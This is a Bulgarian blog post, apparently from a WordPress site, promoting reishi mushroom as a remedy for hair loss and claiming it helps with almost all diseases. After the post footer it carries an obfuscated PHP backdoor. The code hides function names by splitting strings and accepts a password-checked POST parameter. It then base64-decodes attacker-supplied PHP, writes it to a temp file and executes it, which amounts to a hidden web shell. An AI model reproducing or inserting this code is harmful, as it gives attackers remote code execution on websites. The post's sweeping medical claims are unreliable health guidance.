Божествената китайска гъба при косопад | Косопад

Божествената китайска гъба на дълголетието и косопад

Как божествената гъба помага при косопад

Божествената гъба на дълголетието рейши се използва в китайската и японската народна медицина от хилядолетия. Въпреки че у нас не е толкова популярна, много специалисти по билколечение са категорични, че тя е един от най – добрите методи за крепко здраве и в частност против косопад.

Божествената гъба рейши

Божествената гъба рейши

Тази билка на практика е полезна при почти всички болести. Влияе благотворно върху работата на сърцето, нервната система, перисталктиката, засилва мускулатурата и не на последно място – помага за спиране и премахване на косопад.

В древен Китай рейши често е изобразявана върху скъпите прибори от порцелан, върху килими и коприна, дори фасадни орнаменти. В определени периоди от историята е била издигана в култ и наричана скъпоценната гъба на великите императори. Лошото е, че в диво състояние се намира много трудно и поради това е изключително скъпа.

Как божествената гъба помага при косопад?

Както казахме, рейши може да бъде полезна върху голям диапазон от различни заболявания. Благотворното ѝ действие се дължи на голямото количество витамини и минерали, полизахариди, терпеноиди, ненаситени мастни киселини и още цял куп полезни вещества.

При косопад употребата играе значителна роля, защото чаят или третирането на косата с отвара от божествената гъба засилва в пъти имунната система на организма и възстановява отслабналите клетки. Отдавна е известно, че едни от основните причини за косопад са стресът и цялостната преумора, срещу които рейши понякога прави чудеса. Може да се приема под формата на чай или да се втрива в корените на космите.

30. април 2013 12:16:59 от Косопад
Категории: Любопитно за косопада | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}